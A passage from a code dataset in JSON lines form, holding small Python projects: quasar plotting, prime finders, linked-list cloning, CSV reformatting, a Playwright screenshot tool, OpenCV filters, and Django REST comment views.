data[\"REDSHIFT\"]:\r\n luminosity_distances.append(cosmo.luminosity_distance(r))\r\n\r\nDM = []\r\nfor d in luminosity_distances:\r\n DM.append((5*np.log10(d/(10 * u.pc))))\r\n\r\nabsMag = []\r\nfor mag, dist_mod in zip(sdss['modelMag_i'], DM):\r\n absMag.append(mag - dist_mod.value)\r\n#%%\r\nra = data['RA']\r\ndec = data['DEC']\r\n\r\ndef projection(ra, dec, proj = 'aitoff', org = 0, facecolor = 'LightCyan', mcolor = 'b', alpha = 0.3, title = ''):\r\n ra = np.remainder(ra+360-org,360) # shift RA values\r\n ra[ra>180] -=360 # scale conversion to [-180, 180]\r\n ra=-ra # reverse the scale: East to the left\r\n tick_labels = np.array([150, 120, 90, 60, 30, 0, 330, 300, 270, 240, 210])\r\n tick_labels = np.remainder(tick_labels+360+org,360)\r\n \r\n #1 hr = 15 deg \r\n labels =[]\r\n for label in tick_labels: #in degrees, want hrs\r\n labels.append(str(int(label*(1/15))) + '$^h$')\r\n \r\n fig = plt.figure(figsize=(8,4.2))\r\n ax = fig.add_subplot(111, projection= proj, facecolor = facecolor)\r\n plt.plot(np.radians(ra),np.radians(dec), 'o', color = mcolor , markersize=4, alpha=alpha) # convert degrees to radians\r\n ax.set_title(title, y=1.08, fontsize = 14) \r\n ax.set_xticklabels(tick_labels, visible = False)\r\n ax.set_xticklabels(labels, visible = True)\r\n ax.set_xlabel(\"RA\")\r\n ax.xaxis.label.set_fontsize(12)\r\n ax.set_ylabel(\"Dec\")\r\n ax.yaxis.label.set_fontsize(12)\r\n ax.grid(True)\r\n return fig\r\n\r\nprojection(ra, dec, org = 120, facecolor = 'azure', mcolor = 'deeppink', alpha = 0.5, title = 'Aitoff Projection of Quasar Sample').savefig('Aitoff Projection.png')\r\n#%%\r\nfig=plt.figure(figsize=(8,8))\r\ngs=GridSpec(6,6) # 6 rows, 6 columns\r\n\r\nax1=fig.add_subplot(gs[0:5:,0]) #histogram of absolute magnitude i\r\nax2=fig.add_subplot(gs[5,1:6]) #histogram of redshift\r\nax3=fig.add_subplot(gs[0:5, 1:6]) #redshift vs magnitude i scatterplot\r\n\r\nax3.plot(data['REDSHIFT'], absMag, 'o', color = 'deeppink', markersize=5, alpha=0.5)\r\n\r\nax2.hist(data['REDSHIFT'], bins = 75, color = 'springgreen', alpha=0.5, histtype='bar', ec='g')\r\n\r\nax1.hist(absMag, bins = 50, orientation = 'horizontal', color = 'springgreen', alpha=0.5, 
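The MobyGames search script above assembles its query string by hand. A hedged sketch of that assembly factored into a helper; build_url is an illustrative name, while api_key, title and platform are the query parameters the script itself uses:

from urllib.parse import quote

BASE_URL = 'https://api.mobygames.com/v1/games'

def build_url(api_key, title=None, platform_id=None):
    url = '%s?api_key=%s' % (BASE_URL, api_key)
    if title is not None:
        url += '&title=%s' % quote(title, safe='')   # percent-encode spaces etc.
    if platform_id is not None:
        url += '&platform=%d' % platform_id
    return url

assert build_url('moby_x', title='a b') == \
    'https://api.mobygames.com/v1/games?api_key=moby_x&title=a%20b'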
histtype='bar', ec='g')\r\n\r\nax3.invert_yaxis()\r\nax1.invert_yaxis()\r\nplt.title('Redshift vs I-band Absolute Magnitude', y=1.02,\r\n fontsize = 14)\r\nax1.set_xlabel(' N',\r\n fontsize = 14)\r\nax1.set_ylabel('$M_{i}$', fontsize = 14)\r\nax2.set_xlabel('Redshift (z)', fontsize = 14)\r\nax3.grid(which ='both')\r\n\r\nax1.xaxis.tick_top()\r\nax2.yaxis.tick_right()\r\n\r\nx_major_ticks = np.arange(0,5.25, 1)\r\nx_minor_ticks = np.arange(0,5.25, 0.2)\r\n\r\ny_major_ticks = np.arange(-31., -21.75, 1)\r\ny_minor_ticks = np.arange(-31, -21.75, 0.2)\r\n\r\nax1.set_ylim(-22, -30)\r\nax3.set_ylim(-22, -30)\r\n\r\nax2.set_xlim(0, 5)\r\nax3.set_xlim(0, 5)\r\n\r\nax2.set_ylim(0,45)\r\nax1.set_xlim(0,50)\r\n\r\nax1.set_xlim(0,60)\r\nax2.set_ylim(0,50)\r\n\r\nax1.tick_params(which = 'major', direction = 'inout', length = 12)\r\nax1.tick_params(which = 'minor', direction = 'inout', length = 6) \r\n\r\nax2.tick_params(which = 'major', direction = 'inout', length = 12)\r\nax2.tick_params(which = 'minor', direction = 'inout', length = 6)\r\n\r\nax3.tick_params(which = 'major', direction = 'inout', length = 24)\r\nax3.tick_params(which = 'minor', direction = 'inout', length = 6)\r\n\r\nax2.set_xticks(x_major_ticks)\r\nax2.set_xticks(x_minor_ticks, minor=True)\r\n\r\nax1.set_yticks(y_major_ticks)\r\nax1.set_yticks(y_minor_ticks, minor=True)\r\n\r\nax2.set_xticks(x_major_ticks)\r\nax2.set_xticks(x_minor_ticks, minor=True)\r\n\r\nax3.set_yticks(y_major_ticks)\r\nax3.set_yticks(y_minor_ticks, minor=True)\r\n\r\nax3.set_xticks(x_major_ticks)\r\nax3.set_xticks(x_minor_ticks, minor=True)\r\n\r\nxticklabels = ax3.get_xticklabels()\r\nplt.setp(xticklabels, visible=False)\r\n\r\nyticklabels = ax3.get_yticklabels()\r\nplt.setp(yticklabels, visible=False)\r\n\r\nplt.tight_layout(pad=0, w_pad=-1.8\r\n , h_pad=-2.2)\r\n\r\n\r\nfig.savefig('Redshift vs Absolute Magnitude.png')\r\n","repo_name":"akrshnn6/astr-414","sub_path":"Lab 1/ASTR 414 Lab 1.py","file_name":"ASTR 414 Lab 1.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34572486448","text":"#This program\n\ndef nex_prime(num):\n if num == 0 or num == 1:\n num=1\n \n for i in range(num+1, (num+1)*2, 1):\n if prime(i):\n return i\n\ndef prime(num):\n if num == 2:\n return True\n elif num%2==0:\n return False\n elif num == 1:\n return False\n\n for i in range(3, (num//3),2):\n if(num % i == 0):\n return False\n\n return True\n\n\n# main\nif __name__ == \"__main__\":\n #input Number\n num= int(input(\"Enter the Number: \"))\n\n i = nex_prime(num)\n print(\"If givien Number is\",num,\" and the next Prime Number is\",i)\n","repo_name":"KrishothKumar/Python_Practice","sub_path":"next_prime.py","file_name":"next_prime.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17241246850","text":"class test(object):\n\t\"\"\"docstring for test\"\"\"\n\tname = 'default'\n # self为默认传递的实例对象本身,方法中不能直接访问方法类中的属性\n\tdef __init__(self, arg):\n\t\tsuper(test, self).__init__()\n\t\tself.arg = arg\n\t\tprint(self.name)\n\t\t\nt = test(\"test\")\n\n# 检查t对象是否为test的实例\nprint(isinstance(t,test))\n\nt.name = 'lov'\nprint(t.name)\n\n# \n# 所有对象都是type的实例,类也是对象\nprint(type(test))\n\n# 创建test类,对应内存中一块区域,类型为type\n# 创建test类实例时,有开辟新的内存空间创建test类型的对象\n# 在变量-id的映射表中,将id赋给变量 
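The quasar lab script above converts apparent to absolute magnitudes through the distance modulus, DM = 5 log10(d_L / 10 pc) and M = m - DM. A minimal sketch of that single step, built with the same cosmology the script constructs; the apparent magnitude 19.0 is a made-up example value:

import numpy as np
from astropy import units as u
from astropy.cosmology import LambdaCDM

cosmo = LambdaCDM(H0=70 * u.km / u.s / u.Mpc, Om0=0.3, Ode0=0.7)
d = cosmo.luminosity_distance(1.0)        # luminosity distance at z = 1
dm = 5 * np.log10(d / (10 * u.pc))        # distance modulus (dimensionless)
abs_mag = 19.0 - dm.value                 # M = m - DM for a hypothetical m_i = 19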
","repo_name":"sblov/Python_base","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8943153684","text":"# -*- coding:utf-8 -*-\nclass RandomListNode:\n def __init__(self, x):\n self.label = x\n self.next = None\n self.random = None\n\n\nclass Solution:\n # 返回 RandomListNode\n def Clone(self, pHead):\n # write code here\n if pHead is None:\n return None\n self.CloneNodes(pHead)\n self.ConnectRandomNodes(pHead)\n return self.ReConnectNodes(pHead)\n \n # 复制原始链表的任一节点N并创建新节点N',再把N'放在N的后面\n def CloneNodes(self, pHead):\n pNode = pHead\n while pNode:\n pCloned = RandomListNode(pNode.label)\n pCloned.next = pNode.next\n pNode.next = pCloned\n pNode = pCloned.next\n \n # 如果原始链表上的节点N的random指向S,则对应的复制节点N'的random指向S'(S的下一个节点)\n def ConnectRandomNodes(self, pHead):\n pNode = pHead\n while pNode:\n pCloned = pNode.next\n if pNode.random:\n pCloned.random = pNode.random.next\n pNode = pCloned.next\n \n # 把得到的链表拆成两个链表,奇数位置上的节点组成原链表,偶数位置上的节点组成复制链表\n def ReConnectNodes(self, pHead):\n pNode = pHead\n pClonedHead = pHead.next\n while pNode:\n cloneNode = pNode.next\n pNode.next = cloneNode.next\n cloneNode.next = None if cloneNode.next is None else cloneNode.next.next\n pNode = pNode.next\n return pClonedHead\n\n\nif __name__ == \"__main__\":\n p1 = RandomListNode(1)\n p2 = RandomListNode(2)\n p3 = RandomListNode(3)\n p4 = RandomListNode(4)\n p5 = RandomListNode(5)\n p1.next = p2\n p2.next = p3\n p3.next = p4\n p4.next = p5\n p1.random = p3\n p2.random = p5\n p4.random = p2\n\n s = Solution()\n pClone = s.Clone(p1)\n pNode = pClone\n while pNode:\n print(pNode.label)\n pNode = pNode.next\n\n","repo_name":"zhengxiang1994/JIANZHI-offer","sub_path":"test1/demo25.py","file_name":"demo25.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73804422244","text":"from math import factorial\nfrom math import ceil\nclass solution:\n def getPermutation(self, n, k):\n ans = []\n stuff = list(map(str, range(1, n + 1)))\n self.fill(n, k, ans, stuff)\n return ''.join(ans)\n\n def fill(self, n, k, ans, stuff):\n if n > 0:\n x = factorial(n - 1)\n ans.append(stuff.pop(ceil(k/x)-1))\n self.fill(n - 1, k % x, ans, stuff)\n else:\n return\n\nn = 4\nk = 9\nobj = solution()\nprint(obj.getPermutation(n, k))","repo_name":"tanjingjing123/LeetcodeAlgorithms","sub_path":"permulationSequence.py","file_name":"permulationSequence.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20283346416","text":"import os\r\nimport csv\r\nfrom datetime import datetime\r\n\r\n\r\nus_state_abbrev = { \r\n 'Alabama': 'AL', \r\n 'Alaska': 'AK', \r\n 'Arizona': 'AZ', \r\n 'Arkansas': 'AR', \r\n 'California': 'CA', \r\n 'Colorado': 'CO', \r\n 'Connecticut': 'CT', \r\n 'Delaware': 'DE', \r\n 'Florida': 'FL', \r\n 'Georgia': 'GA', \r\n 'Hawaii': 'HI', \r\n 'Idaho': 'ID', \r\n 'Illinois': 'IL', \r\n 'Indiana': 'IN', \r\n 'Iowa': 'IA', \r\n 'Kansas': 'KS', \r\n 'Kentucky': 'KY', \r\n 'Louisiana': 'LA', \r\n 'Maine': 'ME', \r\n 'Maryland': 'MD', \r\n 'Massachusetts': 'MA', \r\n 'Michigan': 'MI', \r\n 'Minnesota': 'MN', \r\n 'Mississippi': 'MS', \r\n 'Missouri': 'MO', \r\n 'Montana': 'MT', \r\n 'Nebraska': 'NE', \r\n 'Nevada': 'NV', \r\n 'New Hampshire': 'NH', \r\n 'New Jersey': 'NJ', \r\n 'New Mexico': 'NM', 
\r\n 'New York': 'NY', \r\n 'North Carolina': 'NC', \r\n 'North Dakota': 'ND', \r\n 'Ohio': 'OH', \r\n 'Oklahoma': 'OK', \r\n 'Oregon': 'OR', \r\n 'Pennsylvania': 'PA', \r\n 'Rhode Island': 'RI', \r\n 'South Carolina': 'SC', \r\n 'South Dakota': 'SD', \r\n 'Tennessee': 'TN', \r\n 'Texas': 'TX', \r\n 'Utah': 'UT', \r\n 'Vermont': 'VT', \r\n 'Virginia': 'VA', \r\n 'Washington': 'WA', \r\n 'West Virginia': 'WV', \r\n 'Wisconsin': 'WI', \r\n 'Wyoming': 'WY'\r\n } \r\n\r\nfile_list=['employee_data1.csv', 'employee_data2.csv']\r\n\r\n#file_list=['employee_data1.csv','employee_data2.csv']\r\noutput_file_path = os.path.join('output', 'employee_data_final.csv')\r\nwith open(output_file_path, 'w', newline='') as output_data:\r\n field_names=['Emp ID', 'First Name', 'Last Name', 'DOB', 'SSN', 'State']\r\n dict_writer=csv.DictWriter(output_data,fieldnames=field_names)\r\n dict_writer.writeheader()\r\n\r\n for data_file in file_list: \r\n file_path = os.path.join('raw_data',data_file)\r\n \r\n with open(file_path,'r',newline='') as input_data:\r\n\r\n dictReader = csv.DictReader(input_data)\r\n for record in dictReader:\r\n w_record = {}\r\n w_record['Emp ID'] = record['Emp ID']\r\n full_name = str(record['Name']).split(' ')\r\n w_record['First Name'] = full_name[0]\r\n w_record['Last Name'] = full_name[1]\r\n\r\n #date_parts= str(record['DOB']).split('-')\r\n # rec_date = datetime.date(date_parts[0], date_parts[1], date_parts[2])\r\n rec_date= datetime.strptime(record['DOB'],'%Y-%m-%d')\r\n w_record['DOB']=rec_date.strftime('%d/%m/%Y')\r\n w_record['SSN'] = \"***-**-{}\".format(\"\".join(str(record['SSN'])[-4:]))\r\n w_record['State'] = us_state_abbrev[record['State']]\r\n dict_writer.writerow(w_record)\r\n print(w_record)\r\n \r\n\r\n","repo_name":"cahos22/python-challenge","sub_path":"PyBoss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42461817976","text":"#!/opt/alt/python38/bin/python3\n# -*- coding: utf-8 -*\nimport argparse\nfrom playwright.sync_api import sync_playwright\nfrom PIL import Image\nimport re\n\nparser = argparse.ArgumentParser(description=\"Take url and return png and pdf\")\n\nparser.add_argument(\"-u\",help=\"Input the URL to take screenshot.\",required=True)\nparser.add_argument(\"-o\",help=\"Output file.\",required=True)\nargs = parser.parse_args()\ni= 0\nwhile(i<10):\n try:\n with sync_playwright() as p:\n browser = p.chromium.launch()\n page = browser.new_page()\n page.goto(vars(args)[\"u\"])\n page.screenshot(path=vars(args)[\"o\"],full_page=True)\n image1 = Image.open(vars(args)[\"o\"])\n im1 = image1.convert('RGB')\n im1.save(re.sub(r'\\.(png|jpg)+$',\".pdf\",vars(args)[\"o\"]))\n break\n except Exception as e:\n print(e)\n i+=1\n \nprint(\"DONE\")","repo_name":"chrioikon/python_json_short_products","sub_path":"sort_json/take_screenshot.py","file_name":"take_screenshot.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28179704229","text":"import ast\nfrom typing import Set\n\n\nclass SurfaceLevelVisitor(ast.NodeVisitor):\n def __init__(self):\n \"\"\"\n A traverser that finds surface level importable items from the current AST.\n \"\"\"\n self._surface_names = set()\n\n def generic_visit(self, node):\n \"\"\"\n Traverse over any node.\n\n :param node: The node to visit\n \"\"\"\n if isinstance(node, ast.Import) or isinstance(node, 
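A hedged, self-contained mini-version of the per-record transforms in the PyBoss script above: split the name, rewrite the DOB from YYYY-MM-DD to the script's %d/%m/%Y output format, and mask all but the last four SSN digits. transform is an illustrative name:

from datetime import datetime

def transform(record):
    """Split the name, rewrite the DOB, and mask the SSN, as the script does."""
    first, last = record['Name'].split(' ', 1)
    dob = datetime.strptime(record['DOB'], '%Y-%m-%d').strftime('%d/%m/%Y')
    ssn = '***-**-' + str(record['SSN'])[-4:]
    return {'First Name': first, 'Last Name': last, 'DOB': dob, 'SSN': ssn}

row = transform({'Name': 'Ada Lovelace', 'DOB': '1815-12-10', 'SSN': '123-45-6789'})
assert row['SSN'] == '***-**-6789'
assert row['DOB'] == '10/12/1815'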
ast.ImportFrom):\n return\n\n if isinstance(node, ast.Module):\n super().generic_visit(node)\n\n # possibly importable\n elif isinstance(node, ast.Assign):\n # only one assignment\n if hasattr(node.targets[0], 'id'):\n for val in node.targets:\n self.surface_names.add(val.id)\n # multiple assignments\n else:\n for val in node.targets[0].elts:\n self.surface_names.add(val.id)\n else:\n if hasattr(node, 'name'):\n self.surface_names.add(node.name)\n\n @property\n def surface_names(self) -> Set[str]:\n \"\"\"\n Retrieve the surface names found during traversal.\n\n :return: Surface importable names\n \"\"\"\n return self._surface_names\n\n def reset(self):\n \"\"\"\n Reset the state of the visitor.\n \"\"\"\n self._surface_names.clear()\n","repo_name":"tony-zeidan/EvaseAnalysis","sub_path":"evase/depanalyze/surfacedetector.py","file_name":"surfacedetector.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21990076186","text":"import requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://www.azlyrics.com/t/taylorswift.html\"\npage = requests.get(URL)\n\nsoup = BeautifulSoup(page.content, \"html.parser\")\n\ntitles = soup.find(class_=\"listalbum-item\")\n\nprint(titles.prettify())","repo_name":"stewartkwokca/markov-lyrics","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12936708847","text":"# -*- coding:utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\n\nBGR_TO_XYZ = cv2.COLOR_BGR2XYZ\nBGR_TO_HSV = cv2.COLOR_BGR2HSV\nBGR_TO_GRAY = cv2.COLOR_BGR2GRAY\n\nLOW_PASS_FILTER = np.ones((3, 3), np.float32)/9\nHIGH_PASS_FILTER = np.array([[1, 1, 1], [1, -9, 1], [1, 1, 1]])\n\n\ndef change_bgr_to_other(image, color_space):\n return cv2.cvtColor(image, color_space)\n\n\ndef change_all_images_from_bgr_to_other(dir_bgr, dir_other, color_space):\n for name_image in listdir(dir_bgr):\n path_image_bgr = join(dir_bgr, name_image)\n path_image_other = join(dir_other, name_image)\n if isfile(path_image_bgr):\n image_bgr = cv2.imread(path_image_bgr)\n image_other = change_bgr_to_other(image_bgr, color_space)\n cv2.imwrite(path_image_other, image_other)\n\n\ndef apply_filter_to_image(image, kernel):\n return cv2.filter2D(image, -1, kernel)\n\n\ndef equalize_bgr_image(image):\n img_yuv = cv2.cvtColor(image, cv2.COLOR_BGR2YUV)\n img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])\n return cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)\n\n\ndef apply_filter_to_all_images(dir_imgs, dir_imgs_filtered, kernel):\n for name_image in listdir(dir_imgs):\n path_img = join(dir_imgs, name_image)\n path_img_filtered = join(dir_imgs_filtered, name_image)\n if isfile(path_img):\n image = cv2.imread(path_img)\n image_filtered = apply_filter_to_image(image, kernel)\n cv2.imwrite(path_img_filtered, image_filtered)\n\n\ndef equalize_all_bgr_images(dir_bgr, dir_equalized):\n for name_image in listdir(dir_bgr):\n path_img_bgr = join(dir_bgr, name_image)\n path_img_equalized = join(dir_equalized, name_image)\n if isfile(path_img_bgr):\n image_bgr = cv2.imread(path_img_bgr)\n image_equalized = equalize_bgr_image(image_bgr)\n cv2.imwrite(path_img_equalized, 
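A short usage sketch for the SurfaceLevelVisitor above, assuming the class is in scope: it collects top-level names while deliberately skipping imports, and handles both single and tuple assignments.

import ast

source = (
    "import os\n"
    "X = 1\n"
    "a, b = 2, 3\n"
    "def f(): pass\n"
    "class C: pass\n"
)
visitor = SurfaceLevelVisitor()          # defined in the module above
visitor.visit(ast.parse(source))
assert visitor.surface_names == {'X', 'a', 'b', 'f', 'C'}   # 'os' is skipped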
image_equalized)\n","repo_name":"AleFelix/object-detection-py-faster-rcnn","sub_path":"transform_frames/transform_image.py","file_name":"transform_image.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13097081275","text":"from sys import stdin\n\n\ndef solution(N, nums):\n if N <= 2:\n return 0\n nums.sort()\n\n count = 0\n for i in range(N):\n target = nums[i]\n lp, rp = 0, N-1\n while lp < rp:\n if rp == i:\n rp -= 1\n continue\n if lp == i:\n lp += 1\n continue\n\n summed = nums[lp] + nums[rp]\n if summed == target:\n count += 1\n break\n elif summed < target:\n lp += 1\n elif summed > target:\n rp -= 1\n return count\n\n\nN = int(stdin.readline())\nnums = list(map(int, stdin.readline().strip().split(' ')))\n\nprint(solution(N, nums))\n\n\"\"\"\n3\n0 0 0\n\"\"\"\n\"\"\"\n4\n0 0 1 1\n\"\"\"\n\"\"\"\n7\n0 0 0 0 0 1 1\n\"\"\"","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/1253 좋다.py","file_name":"1253 좋다.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2765754375","text":"# -*- coding: utf8 -*-\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom horizon.views import APIView\nfrom comment.serializers import (CommentSerializer,\n CommentDetailSerializer,\n CommentListSerializer,\n CommentOpinionRecordSerializer)\nfrom comment.permissions import IsOwnerOrReadOnly\nfrom comment.models import (Comment,\n SOURCE_TYPE_DB,\n CommentOpinionRecord,)\nfrom comment.caches import (CommentCache,\n CommentOpinionModelAction)\nfrom comment.forms import (CommentInputForm,\n CommentListForm,\n CommentDetailForm,\n CommentDeleteForm,\n CommentForResourceListForm,\n CommentOpinionActionForm)\nfrom score.caches import ScoreAction\n\nimport json\n\n\nclass CommentAction(generics.GenericAPIView):\n \"\"\"\n 点评相关功能\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly, )\n\n def is_request_data_valid(self, request, **kwargs):\n instance = SOURCE_TYPE_DB[kwargs['source_type']].get_object(pk=kwargs['source_id'])\n if isinstance(instance, Exception):\n return False, 'The source of %s does not exist.' 
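The Baekjoon 1253 solution above counts "good" numbers (elements equal to the sum of two other elements at distinct indices) with sort-plus-two-pointers in O(n^2). A tiny brute-force restatement of the same definition, useful as a cross-check for the pointer bookkeeping; count_good is an illustrative name:

from itertools import combinations

def count_good(nums):
    """Count elements expressible as the sum of two other elements."""
    good = 0
    for i, target in enumerate(nums):
        others = [x for j, x in enumerate(nums) if j != i]
        if any(a + b == target for a, b in combinations(others, 2)):
            good += 1
    return good

assert count_good([0, 0, 0]) == 3        # each 0 is 0 + 0 of the other two
assert count_good([1, 2, 3, 4]) == 2     # 3 = 1 + 2 and 4 = 1 + 3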
% kwargs['source_id']\n\n kwargs.pop('content')\n instance = Comment.get_object(user_id=request.user.id, **kwargs)\n if isinstance(instance, Comment):\n return False, 'Can not repeat commented.'\n return True, None\n\n def get_comment_object(self, request, comment_id):\n return Comment.get_object(pk=comment_id, user_id=request.user.id)\n\n def score_action(self, request):\n \"\"\"\n 增加积分及添加积分记录\n \"\"\"\n return ScoreAction.score_action(request, action='comment')\n\n def post(self, request, *args, **kwargs):\n \"\"\"\n 用户点评资源(资源、案例及资讯)\n \"\"\"\n form = CommentInputForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n is_valid, error_message = self.is_request_data_valid(request, **cld)\n if not is_valid:\n return Response({'Detail': error_message}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = CommentSerializer(data=cld, request=request)\n if not serializer.is_valid():\n return Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n try:\n serializer.save()\n except Exception as e:\n return Response({'Detail': e.args}, status=status.HTTP_400_BAD_REQUEST)\n result = self.score_action(request)\n if isinstance(result, Exception):\n return Response({'Detail': result.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n 删除评论\n \"\"\"\n form = CommentDeleteForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n instance = self.get_comment_object(request, cld['id'])\n if isinstance(instance, Exception):\n return Response({'Detail': instance.args}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = CommentSerializer(instance)\n try:\n serializer.delete(instance)\n except Exception as e:\n return Response({'Detail': e.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CommentList(generics.GenericAPIView):\n \"\"\"\n 用户点评列表\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly, )\n\n def get_comment_detail_list(self, request):\n return CommentCache().get_comment_list_by_user_id(request.user.id)\n # return Comment.filter_details(user_id=request.user.id)\n\n def post(self, request, *args, **kwargs):\n form = CommentListForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n details = self.get_comment_detail_list(request)\n serializer = CommentListSerializer(data=details)\n if not serializer.is_valid():\n return Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n data_list = serializer.list_data(**cld)\n if isinstance(data_list, Exception):\n return Response({'Detail': data_list.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(data_list, status=status.HTTP_200_OK)\n\n\nclass CommentDetail(generics.GenericAPIView):\n \"\"\"\n 点评详情\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly,)\n\n def get_comment_detail(self, request, comment_id):\n kwargs = {'user_id': request.user.id,\n 'id': comment_id}\n return Comment.get_object(**kwargs)\n\n def post(self, request, *args, **kwargs):\n form = CommentDetailForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n detail = 
self.get_comment_detail(request, cld['id'])\n if isinstance(detail, Exception):\n return Response({'Detail': detail.args}, status=status.HTTP_400_BAD_REQUEST)\n serializer = CommentDetailSerializer(data=detail)\n if not serializer.is_valid():\n return Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass CommentForResourceList(APIView):\n \"\"\"\n 获取媒体资源的用户评论列表\n \"\"\"\n def get_comment_list(self, source_type, source_id):\n kwargs = {'source_type': source_type,\n 'source_id': source_id}\n return CommentCache().get_comment_list_by_source_id(**kwargs)\n # return Comment.filter_details(**kwargs)\n\n def post(self, request, *args, **kwargs):\n form = CommentForResourceListForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n comment_list = self.get_comment_list(cld['source_type'], cld['source_id'])\n serializer = CommentListSerializer(data=comment_list)\n if not serializer.is_valid():\n return Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n list_data = serializer.list_data(**cld)\n if isinstance(list_data, Exception):\n return Response({'Detail': list_data.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(list_data, status=status.HTTP_200_OK)\n\n\nclass CommentOpinionAction(generics.GenericAPIView):\n \"\"\"\n 用户对评论的评价(点赞、踩)\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly,)\n\n def get_comment_opinion_record(self, request, comment_id):\n kwargs = {'user_id': request.user.id,\n 'comment_id': comment_id}\n return CommentOpinionRecord.get_object(**kwargs)\n\n def post(self, request, *args, **kwargs):\n form = CommentOpinionActionForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n record = self.get_comment_opinion_record(request, cld['comment_id'])\n if not isinstance(record, Exception):\n return Response({'Detail': 'Can not repeat operate.'}, status=status.HTTP_400_BAD_REQUEST)\n\n result = CommentOpinionModelAction.comment_opinion_action(request,\n comment_id=cld['comment_id'],\n action=cld['action'])\n if isinstance(result, Exception):\n return Response({'Detail': result.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'Result': True}, status=status.HTTP_201_CREATED)\n\n","repo_name":"dennis1984/BYWebApp","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31620340749","text":"#!/usr/bin/env python\n\n# First imported in p47\n\nimport math\nimport sys\nimport random\n\nclass Prime:\n _primes = []\n _is_prime = []\n _max = 1\n\n def __init__(self):\n self._primes = list((2,3,5,7))\n self._is_prime = list((False, False, True, True, False, True, False, True))\n self._max = 7\n \n def __init__(self, max):\n self._primes = list((2,3,5,7))\n self._is_prime = list((False, False, True, True, False, True, False, True))\n self._max = 7\n self._set_max(max)\n\n def _set_max(self, m):\n if m < self._max or self._primes[len(self._primes)-1] == m:\n return\n prev_max = self._max\n # expand\n for i in range(prev_max, m+1):\n self._is_prime.append(True)\n prev_max = self._max\n # step through known primes\n for p in self._primes:\n x = prev_max + (p - (prev_max % p))\n if x == p:\n x += p\n while x <= m:\n 
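Every view in the comment app above repeats the same prologue: bind a form, and return a 400 response when validation fails. A hedged sketch of that shared pattern lifted into a helper; validate_or_error is a hypothetical name, not part of the app:

from rest_framework import status
from rest_framework.response import Response

def validate_or_error(form_class, data):
    """Bind the form; return (cleaned_data, None) or (None, a 400 Response)."""
    form = form_class(data)
    if not form.is_valid():
        return None, Response({'Detail': form.errors},
                              status=status.HTTP_400_BAD_REQUEST)
    return form.cleaned_data, None

# Usage inside a view method:
#   cld, err = validate_or_error(CommentInputForm, request.data)
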